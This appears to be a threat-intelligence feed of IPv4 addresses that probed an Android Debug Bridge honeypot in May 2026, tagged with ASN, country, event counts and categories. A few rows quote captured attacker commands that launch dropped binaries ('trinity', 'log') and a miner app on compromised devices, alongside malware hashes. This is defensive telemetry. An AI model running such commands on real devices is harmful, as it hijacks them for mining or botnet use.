IPv4	176.65.139.99	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=38 \| first_seen=2026-05-27T14:08:06.000Z \| last_seen=2026-05-30T14:29:31.453Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	143.42.1.213	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-27T15:57:40.000Z \| last_seen=2026-05-27T15:58:50.951Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	165.232.96.194	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-27T15:43:56.000Z \| last_seen=2026-05-27T15:45:03.839Z \| ports=5555 \| cc=GB \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	172.233.221.115	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-27T15:57:20.000Z \| last_seen=2026-05-27T15:58:23.024Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	65.49.20.66	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-27T15:09:41.000Z \| last_seen=2026-05-27T15:19:48.954Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	65.49.20.74	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-27T15:08:58.000Z \| last_seen=2026-05-27T15:10:00.681Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	5.61.209.224	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=SC; asn=206264; asn_org=Amarutu Technology Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-27T16:50:14.000Z \| last_seen=2026-05-27T17:02:14.082Z \| ports=5555 \| cc=SC \| asn=206264 \| org=Amarutu Technology Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	66.132.195.146	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-27T16:55:35.000Z \| last_seen=2026-05-27T16:57:15.461Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	157.245.71.193	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-27T17:15:57.000Z \| last_seen=2026-05-27T17:26:14.355Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	20.64.105.20	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=25 \| first_seen=2026-05-27T18:08:11.000Z \| last_seen=2026-05-27T18:19:33.334Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	66.132.195.59	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-27T21:33:15.000Z \| last_seen=2026-05-27T21:34:32.432Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	205.210.31.170	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-27T23:55:57.000Z \| last_seen=2026-05-28T00:07:25.270Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	193.24.211.103	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=215929; asn_org=Data Campus Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-28T01:05:37.000Z \| last_seen=2026-05-28T01:06:45.099Z \| ports=5555 \| cc=DE \| asn=215929 \| org=Data Campus Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	216.218.206.69	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-28T01:28:32.000Z \| last_seen=2026-05-28T01:38:37.132Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	216.218.206.89	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-28T01:26:31.000Z \| last_seen=2026-05-28T01:27:39.173Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	177.125.137.18	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=MX; asn=265523; asn_org=Sierra Madre Internet SA de CV; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=1377 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-28T04:54:06.000Z \| last_seen=2026-05-28T05:04:25.214Z \| ports=5555 \| cc=MX \| asn=265523 \| org=Sierra Madre Internet SA de CV	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	176.65.149.31	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Misc activity; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-28T08:52:02.000Z \| last_seen=2026-05-28T09:18:25.599Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	54.176.89.235	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=16509; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-28T10:07:38.000Z \| last_seen=2026-05-28T10:17:53.893Z \| ports=5555 \| cc=US \| asn=16509 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	66.175.212.77	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-28T10:07:36.000Z \| last_seen=2026-05-28T10:08:37.503Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	185.141.119.49	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=36 \| first_seen=2026-05-28T13:55:19.000Z \| last_seen=2026-05-29T20:55:12.324Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	221.233.24.226	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-17T00:15:48.000Z \| last_seen=2026-05-28T14:46:59.066Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	65.49.1.127	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-28T14:36:34.000Z \| last_seen=2026-05-28T14:37:37.754Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	174.138.39.104	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-28T16:28:49.000Z \| last_seen=2026-05-28T16:29:59.127Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	45.229.147.67	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BR; asn=267155; asn_org=VOE INTERNET; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-28T16:38:45.000Z \| last_seen=2026-05-28T16:39:53.381Z \| ports=5555 \| cc=BR \| asn=267155 \| org=VOE INTERNET	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	91.230.168.141	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-28T17:12:54.000Z \| last_seen=2026-05-28T17:23:11.115Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	91.230.168.191	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-28T17:12:54.000Z \| last_seen=2026-05-28T17:23:04.180Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	142.93.249.5	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-28T19:51:39.000Z \| last_seen=2026-05-28T19:52:50.984Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	188.166.110.177	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-28T19:57:55.000Z \| last_seen=2026-05-28T20:08:41.534Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	66.132.195.76	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-28T22:40:00.000Z \| last_seen=2026-05-28T22:41:19.376Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-28
IPv4	147.185.133.161	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-29T01:08:15.000Z \| last_seen=2026-05-29T01:19:34.243Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	147.185.132.115	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-29T02:58:13.000Z \| last_seen=2026-05-29T03:09:48.876Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	137.184.205.191	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-29T03:40:48.000Z \| last_seen=2026-05-29T03:41:56.803Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	45.13.212.66	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RO; asn=215929; asn_org=Data Campus Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-29T08:12:32.000Z \| last_seen=2026-05-29T08:13:34.134Z \| ports=5555 \| cc=RO \| asn=215929 \| org=Data Campus Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	85.253.250.26	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=EE; asn=2586; asn_org=Elisa Eesti AS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-29T10:54:46.000Z \| last_seen=2026-05-29T11:04:50.799Z \| ports=5555 \| cc=EE \| asn=2586 \| org=Elisa Eesti AS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	138.68.29.8	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-29T11:15:29.000Z \| last_seen=2026-05-29T11:25:40.899Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	47.250.42.174	Attacker IP • ADB / seen in ADBHoney; events=51; ports=5555; cc=MY; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=51 \| first_seen=2026-05-29T11:50:13.000Z \| last_seen=2026-05-29T11:52:16.382Z \| ports=5555 \| cc=MY \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	176.65.139.66	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=151 \| first_seen=2026-05-29T14:13:08.000Z \| last_seen=2026-05-30T11:32:53.451Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	119.156.31.177	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=PK; asn=17557; asn_org=Pakistan Telecommunication Company Limited; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-29T21:55:31.000Z \| last_seen=2026-05-29T22:05:48.391Z \| ports=5555 \| cc=PK \| asn=17557 \| org=Pakistan Telecommunication Company Limited	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-29
IPv4	218.205.95.163	Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=CN; asn=56041; asn_org=China Mobile communications corporation; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=59 \| first_seen=2026-05-29T21:44:37.000Z \| last_seen=2026-05-29T21:57:01.921Z \| ports=5555 \| cc=CN \| asn=56041 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-29
IPv4	66.132.195.121	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-29T23:34:41.000Z \| last_seen=2026-05-29T23:36:00.918Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	134.199.154.140	Attacker IP • ADB / seen in ADBHoney; events=40; ports=5555; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=40 \| first_seen=2026-05-30T00:39:55.000Z \| last_seen=2026-05-30T00:40:12.679Z \| ports=5555 \| cc=AU \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	209.38.21.19	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=AU; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-30T00:12:32.000Z \| last_seen=2026-05-30T00:13:34.303Z \| ports=5555 \| cc=AU \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	165.22.230.36	Attacker IP • ADB / seen in ADBHoney; events=21; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=21 \| first_seen=2026-05-30T02:09:57.000Z \| last_seen=2026-05-30T02:20:14.587Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	65.49.20.111	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-30T03:53:34.000Z \| last_seen=2026-05-30T03:54:39.934Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	216.25.89.83	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-30T05:25:40.000Z \| last_seen=2026-05-30T05:26:40.974Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	65.49.1.71	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-30T12:12:27.000Z \| last_seen=2026-05-30T12:13:32.947Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	113.215.189.220	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=CN; asn=24139; asn_org=Huashu media&Network Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-30T14:17:34.000Z \| last_seen=2026-05-30T14:27:46.920Z \| ports=5555 \| cc=CN \| asn=24139 \| org=Huashu media&Network Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	113.215.189.235	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=CN; asn=24139; asn_org=Huashu media&Network Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-30T14:22:39.000Z \| last_seen=2026-05-30T14:32:52.487Z \| ports=5555 \| cc=CN \| asn=24139 \| org=Huashu media&Network Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	153.3.160.152	Attacker IP • ADB / seen in ADBHoney; events=62; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/log" Observed in ADBHoney telemetry for 2026-05. events=62 \| first_seen=2026-05-30T14:43:52.000Z \| last_seen=2026-05-30T14:56:58.658Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971,7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865,d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-30
IPv4	192.109.200.252	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-30T16:42:22.000Z \| last_seen=2026-05-31T18:40:31.533Z \| ports=5555 \| cc=BG \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-30
IPv4	120.237.40.74	Attacker IP • ADB / seen in ADBHoney; events=36; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; adb_cmd_hits=0; cmd="am start -n com.ufo.miner/com.example.test.MainActivity" Observed in ADBHoney telemetry for 2026-05. events=52 \| first_seen=2026-05-30T21:58:55.000Z \| last_seen=2026-05-30T22:10:51.637Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd. \| related_hashes=76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-30
IPv4	20.169.49.44	Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=26 \| first_seen=2026-05-30T23:06:30.000Z \| last_seen=2026-05-30T23:17:27.722Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	211.195.251.227	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-30T23:08:10.000Z \| last_seen=2026-05-30T23:18:20.526Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	167.94.145.42	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398705; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-31T00:10:02.000Z \| last_seen=2026-05-31T00:11:42.373Z \| ports=5555 \| cc=US \| asn=398705 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	66.132.195.44	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-31T00:32:40.000Z \| last_seen=2026-05-31T00:34:07.110Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	45.198.224.130	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-31T03:09:38.000Z \| last_seen=2026-05-31T03:10:46.712Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	72.255.19.177	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=1 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-31T03:18:11.000Z \| last_seen=2026-05-31T03:28:26.669Z \| ports=5555 \| cc=PK \| asn=9541 \| org=Cyber Internet Services Pvt Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	134.199.214.30	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-31T04:41:03.000Z \| last_seen=2026-05-31T04:42:04.937Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	198.235.24.78	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-31T06:56:06.000Z \| last_seen=2026-05-31T07:07:26.797Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
IPv4	27.225.16.105	Attacker IP • ADB / seen in ADBHoney; events=54; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=59 \| first_seen=2026-05-31T08:51:28.000Z \| last_seen=2026-05-31T09:09:00.435Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-31
IPv4	64.62.156.174	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-31T08:45:22.000Z \| last_seen=2026-05-31T08:46:27.785Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-31
